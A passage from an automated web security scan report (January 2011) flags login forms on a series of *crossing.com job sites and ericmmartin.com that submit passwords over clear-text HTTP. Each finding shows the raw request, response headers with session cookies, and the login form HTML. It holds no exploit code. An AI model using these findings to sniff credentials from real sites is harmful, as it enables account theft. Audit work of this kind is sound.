Content-Length: 111450

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dotnetcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.37. http://www.ecommercecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122922

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.ecommercecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.38. http://www.editingcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.editingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.39. http://www.educationcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.educationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.40. http://www.employmentcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.employmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.41. http://www.energycrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117799

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.energycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.42. http://www.engineeringcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.engineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.43. http://www.entrylevelcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149370

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.entrylevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.44. http://www.environmentalcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103899

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.45. http://www.environmentalsafetyhealthcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109299

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalsafetyhealthcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.46. http://www.ericmmartin.com/projects/simplemodal/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:09:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 20:01:28 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34881


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

6.47. http://www.erpcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.erpcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.48. http://www.execcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.execcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

